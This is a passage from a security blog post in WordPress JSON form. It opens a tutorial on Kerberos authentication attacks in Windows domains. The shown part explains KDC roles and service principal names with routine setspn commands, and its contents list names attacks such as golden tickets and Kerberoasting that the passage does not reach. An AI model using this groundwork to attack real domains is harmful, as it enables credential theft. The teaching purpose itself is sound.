{"id":572,"date":"2020-04-28T21:37:13","date_gmt":"2020-04-28T21:37:13","guid":{"rendered":"http:\/\/blog.redforce.io\/?p=572"},"modified":"2024-12-14T15:24:04","modified_gmt":"2024-12-14T15:24:04","slug":"windows-authentication-attacks-part-2-kerberos","status":"publish","type":"post","link":"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/","title":{"rendered":"Windows authentication attacks part 2 &#8211; kerberos"},"content":{"rendered":"<h1><span class=\"ez-toc-section\" id=\"Arabic\"><\/span>Arabic<span class=\"ez-toc-section-end\"><\/span><\/h1><div id=\"ez-toc-container\" class=\"ez-toc-v2_0_71 ez-toc-wrap-right counter-hierarchy ez-toc-counter ez-toc-transparent ez-toc-container-direction\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">Table of Contents<\/p>\n<label for=\"ez-toc-cssicon-toggle-item-69d7fe40b7a9f\" class=\"ez-toc-cssicon-toggle-label\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #ff0000;color:#ff0000\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #ff0000;color:#ff0000\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/label><input type=\"checkbox\"  id=\"ez-toc-cssicon-toggle-item-69d7fe40b7a9f\" checked aria-label=\"Toggle\" \/><nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li 
class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Arabic\" title=\"Arabic\">Arabic<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Overview\" title=\"Overview\">Overview<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Service_Principal_Names_SPNs\" title=\"Service Principal Names (SPNs)\">Service Principal Names (SPNs)<\/a><ul class='ez-toc-list-level-2' ><li class='ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Summary\" title=\"Summary\">Summary<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Kerberos_authentication\" title=\"Kerberos authentication\">Kerberos authentication<\/a><ul class='ez-toc-list-level-2' ><li class='ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Setting_up\" title=\"Setting up\">Setting up<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#In_a_nutshell\" title=\"In a nutshell\">In a nutshell<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Pre_AS-REQ\" title=\"Pre AS-REQ\">Pre AS-REQ<\/a><\/li><li class='ez-toc-page-1 
ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#KRB5KDC_ERR_PREAUTH_REQUIRED\" title=\"KRB5KDC_ERR_PREAUTH_REQUIRED\">KRB5KDC_ERR_PREAUTH_REQUIRED<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-10\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#AS-REQ\" title=\"AS-REQ\">AS-REQ<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-11\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#AS-REP\" title=\"AS-REP\">AS-REP<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-12\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Message_A\" title=\"Message A\">Message A<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-13\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Message_B_TGT\" title=\"Message B (TGT)\">Message B (TGT)<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-14\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#TGS-REQ\" title=\"TGS-REQ\">TGS-REQ<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-15\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Message_C\" title=\"Message C\">Message C<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-16\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Message_D\" title=\"Message D\">Message D<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-17\" 
href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#TGS-REP\" title=\"TGS-REP\">TGS-REP<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-18\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Message_E\" title=\"Message E\">Message E<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-19\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Message_F\" title=\"Message F\">Message F<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-20\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Accessing_the_service_AP-REQ\" title=\"Accessing the service (AP-REQ)\">Accessing the service (AP-REQ)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-21\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Authorization\" title=\"Authorization\">Authorization<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-22\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Kerberos_attacks\" title=\"Kerberos attacks\">Kerberos attacks<\/a><ul class='ez-toc-list-level-2' ><li class='ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-23\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Silver_ticket\" title=\"Silver ticket\">Silver ticket<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-24\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Golden_ticket\" title=\"Golden ticket\">Golden ticket<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-25\" 
href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Overpass_the_hash\" title=\"Overpass the hash\">Overpass the hash<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-26\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Kerbroasting\" title=\"Kerbroasting\">Kerbroasting<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-27\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#AS-REP_Roasting\" title=\"AS-REP Roasting\">AS-REP Roasting<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-28\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Unconstrained_Delegation\" title=\"Unconstrained Delegation\">Unconstrained Delegation<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-29\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Constrained_delegation\" title=\"Constrained delegation\">Constrained delegation<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-30\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#User_enumeration\" title=\"User enumeration\">User enumeration<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-31\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Conclusion\" title=\"Conclusion\">Conclusion<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-32\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#References\" title=\"References\">References<\/a><\/li><\/ul><\/nav><\/div>\n\n<p>\u062f\u0647 \u0634\u0631\u062d 
\u0628\u0627\u0644\u0639\u0631\u0628\u0649 \u0644\u0644\u062c\u0632\u0626\u064a\u0647 \u0627\u0644\u062e\u0627\u0635\u0647 \u0628\u0643\u064a\u0641\u064a\u0629 \u0639\u0645\u0644 \u0627\u0644\u0643\u064a\u0631\u0628\u0631\u0648\u0633<br \/>\n\u0645\u0634 \u0645\u0648\u062c\u0648\u062f \u0641\u064a\u0647\u0627 \u0643\u0644 \u0627\u0644\u0644\u0649 \u0645\u0634\u0631\u0648\u062d \u0641\u0649 \u0627\u0644\u0628\u0644\u0648\u062c \u0647\u0646\u0627 \u0628\u0633 \u0641\u064a\u0647\u0627 \u0627\u0644\u0644\u0649 \u064a\u0643\u0641\u064a\u0643 \u062a\u0641\u0647\u0645 \u0627\u0644\u0645\u0643\u062a\u0648\u0628 \u0647\u0646\u0627 \u0628\u0633\u0647\u0648\u0644\u0647<\/p>\n<p><iframe title=\"Windows authentication attacks - Kerberos\" width=\"1040\" height=\"585\" data-src=\"https:\/\/www.youtube.com\/embed\/p81jGJI6gOQ?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><noscript><iframe loading=\"lazy\" title=\"Windows authentication attacks - Kerberos\" width=\"1040\" height=\"585\" src=\"https:\/\/www.youtube.com\/embed\/p81jGJI6gOQ?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/noscript><\/p>\n<h1><span class=\"ez-toc-section\" id=\"Overview\"><\/span>Overview<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>Kerberos is a centralized authentication protocol, works using tickets instead of the challenge-response mechanism.<br \/>\nUnlike the permanent channels between the client and the servers which are required and used when authenticating and using service via NTLM, Kerberos depends on stateless login mechanism using trust between the parties involved in the authentication process instead.<br \/>\nThe client simply asks for a ticket that proof it&#8217;s identity, cache it and uses it when connecting to services.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" 
class=\"alignnone size-full wp-image-578\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/1.jpg\" alt=\"\" width=\"805\" height=\"214\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-578\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/1.jpg\" alt=\"\" width=\"805\" height=\"214\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/1.jpg 805w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/1-300x80.jpg 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/1-768x204.jpg 768w\" sizes=\"auto, (max-width: 805px) 100vw, 805px\" \/><\/noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-579\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2.jpg\" alt=\"\" width=\"776\" height=\"171\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-579\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2.jpg\" alt=\"\" width=\"776\" height=\"171\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-579\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2.jpg\" alt=\"\" width=\"776\" height=\"171\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2.jpg 744w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2-300x66.jpg 300w\" sizes=\"auto, (max-width: 776px) 100vw, 776px\" \/><\/noscript><\/noscript><\/p>\n<p>There is no open tunnel between the client and the service for authentication, actually, the whole authentication process (In normal scenarios) takes place between the client and the <span style=\"color: #0000ff;\">KDC<\/span> 
before even connecting to the service.<br \/>\nBefore proceeding with Kerberos details, we need to make a quick overview regarding Kerberos and put some terms which will be used heavily within this post<br \/>\n1 &#8211; Client: this can be any machine requesting access to any service\u00a0over the network<br \/>\n2 &#8211; Key Distribution Center (<span style=\"color: #0000ff;\">KDC<\/span>) which handle the Kerberos authentication requests, it&#8217;s usually the domain controller or at least has access to the users and services secrets (Hashes) and consists of 2 services,<br \/>\nA &#8211; Authentication server (<span style=\"color: #0000ff;\">AS<\/span>) which receives the client&#8217;s authentication requests<br \/>\nB &#8211; Ticket Granting Service (<span style=\"color: #0000ff;\">TGS<\/span>), which issue tickets to the client to access the services he needs.<br \/>\n3 &#8211; Service: The service you need to gain access to, Both Clients and Services are considered as <span style=\"color: #0000ff;\">principals<\/span>, more on that later.<br \/>\n4 &#8211; <span style=\"color: #0000ff;\">Realm<\/span>, which is the uppercase value of the Domain name in the AD environments.<\/p>\n<p>I don&#8217;t want to flood your brain with terms, so the rest will follow just in their place during walking through the authentication process, but for now, keep the following on mind:<br \/>\n1 &#8211; The whole Kerberos authentication process is going between Client, KDC and service, also it&#8217;s centralized and depends on the trust of the client and the service with the KDC.<br \/>\nThe KDC has access to users and services credentials, it uses these credentials (Secrets) of both user and service to assure the integrity of the user through a cryptographic process which is the main focus of this post.<\/p>\n<p>2 &#8211; Kerberos is used for <strong>authentication<\/strong>, <strong>not authorization<\/strong>.<br \/>\nThis means that Kerberos will help you verify the 
user&#8217;s identity by checking his login data, but yet it won&#8217;t help you to verify if the user has or doesn&#8217;t have access to the service.<br \/>\nIf John is trying to access MSSQL service at 10.0.0.2, Kerberos <strong>will validate<\/strong> John&#8217;s login credentials, but <strong>won&#8217;t validate<\/strong> if John has access to the Databases on that MSSQL service or not.<br \/>\nThe authorization step depends on the service, Privileged Attribute Certificate (<strong>PAC)<\/strong> and the local machine&#8217;s or service&#8217;s policies are usually used for that matter as will mentioned later.<\/p>\n<p>3 &#8211; Kerberos authentication is host-based, not IP based like NTLM, mean if You got a service hosted at machine win2012.jnkfo.lab (192.168.18.12), You should connect to the hostname of the machine instead of the IP address, otherwise, windows will pick up the NTLM authentication instead of Kerberos.<br \/>\nExample: using windows 10 to connect to SMB at win2012.jnkfo.lab (192.168.18.12) using IP address directly.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-583\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.34.07-PM-1024x192.png\" alt=\"\" width=\"1024\" height=\"192\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-583\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.34.07-PM-1024x192.png\" alt=\"\" width=\"1024\" height=\"192\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.34.07-PM-1024x192.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.34.07-PM-300x56.png 300w, 
https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.34.07-PM-768x144.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.34.07-PM-1536x288.png 1536w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.34.07-PM-2048x383.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>NTLM authentication was used, unlike connecting using the hostname where Kerberos authentication is used by default.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-584\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.35.37-PM-1024x193.png\" alt=\"\" width=\"1024\" height=\"193\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-584\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.35.37-PM-1024x193.png\" alt=\"\" width=\"1024\" height=\"193\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.35.37-PM-1024x193.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.35.37-PM-300x57.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.35.37-PM-768x145.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.35.37-PM-1536x290.png 1536w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.35.37-PM-2048x386.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>This is happening because Kerberos requires a Service Principle Name (SPN) while connecting, and before Windows 10 version 1507 and Windows Server 2016 IP addresses couldn&#8217;t be used as a part of 
the SPN name, the only hostname could be used.<br \/>\nMore about that at the SPNs part.<\/p>\n<h1><span class=\"ez-toc-section\" id=\"Service_Principal_Names_SPNs\"><\/span>Service Principal Names (SPNs)<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>As mentioned earlier, Users and Services which are used through the Kerberos authentication process are called principals, These principals should have a specific formatted name that complies with Kerberos requirements.<br \/>\nYou should differentiate between <span style=\"color: #ff0000;\">UPN<\/span> which is the <span style=\"color: #ff0000;\">user<\/span> principal name and <span style=\"color: #ff0000;\">SPN<\/span> which is the <span style=\"color: #ff0000;\">Service<\/span> principal name<br \/>\nSo to connect to an SMB service at host win2012.jnkfo.lab which has the IP address of 192.168.18.12<br \/>\nBy default, Kerberos isn&#8217;t used to authenticate your client with the SMB using the IP address, it requires what&#8217;s called the SPN, which take the following formats<\/p>\n<blockquote><p>ServiceClass\/Host:Port<\/p><\/blockquote>\n<p>So for MsSQL, You will find the following SPN<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">C:\\Users\\Administrator&gt;setspn -L jnkfo\\mssqlserver\r\nRegistered ServicePrincipalNames for CN=mssqlserver,CN=Users,DC=jnkfo,DC=lab:\r\n        MSSQLSvc\/win2012.jnkfo.lab:1433<\/pre>\n<p><span style=\"color: #ff0000;\">MSSQLSvc<\/span>: is the service class<br \/>\n<span style=\"color: #ff0000;\">win2012.jnkfo.lab<\/span>: is the Host where the service can be found<br \/>\n<span style=\"color: #ff0000;\">1433<\/span>: is the port on which the service is running.<br \/>\nSysadmins can register the service without adding the port number, it&#8217;s not mandatory but it&#8217;s needed in several cases.<\/p>\n<p>Services SPNs must be set before using Kerberos for authentication, otherwise, You&#8217;ll get a KRB5KDC_ERR_S_PRINCIPAL_UNKNOWN 
error<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-586\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.02.56-PM-1024x159.png\" alt=\"\" width=\"1024\" height=\"159\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-586\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.02.56-PM-1024x159.png\" alt=\"\" width=\"1024\" height=\"159\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.02.56-PM-1024x159.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.02.56-PM-300x46.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.02.56-PM-768x119.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.02.56-PM-1536x238.png 1536w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.02.56-PM-2048x317.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>An SPN can be registered using<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">setspn -A ServiceClass\/Hostname:Port Domain\\Username<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-587\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.06.25-PM-1024x241.png\" alt=\"\" width=\"1024\" height=\"241\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-587\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.06.25-PM-1024x241.png\" alt=\"\" 
width=\"1024\" height=\"241\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.06.25-PM-1024x241.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.06.25-PM-300x71.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.06.25-PM-768x181.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.06.25-PM-1536x361.png 1536w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.06.25-PM-2048x481.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>Now I can connect to the service normally<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-588\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.18.27-PM-1024x197.png\" alt=\"\" width=\"1024\" height=\"197\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-588\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.18.27-PM-1024x197.png\" alt=\"\" width=\"1024\" height=\"197\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.18.27-PM-1024x197.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.18.27-PM-300x58.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.18.27-PM-768x147.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.18.27-PM-1536x295.png 1536w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.18.27-PM.png 2010w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>After windows 
server 2016 and Windows 10 version 1507 IP addresses can be used as a part of the SPN, but that&#8217;s not the default and requires updating the client&#8217;s settings which aren&#8217;t our concern today, more details can be found <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows-server\/security\/kerberos\/configuring-kerberos-over-ip\">here<\/a><\/p>\n<p>There are several default SPNs for windows including CIFS, LDAP, Host, terminal services&#8230; etc<br \/>\nThe Host SPN itself including several services beneath it, You will find that the &#8220;host&#8221; SPN is called when executing certain functions.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-589\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.54.58-PM-1024x311.png\" alt=\"\" width=\"1024\" height=\"311\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-589\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.54.58-PM-1024x311.png\" alt=\"\" width=\"1024\" height=\"311\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.54.58-PM-1024x311.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.54.58-PM-300x91.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.54.58-PM-768x234.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.54.58-PM-1536x467.png 1536w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.54.58-PM-2048x623.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>These services can be obtained from the ADSI<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone 
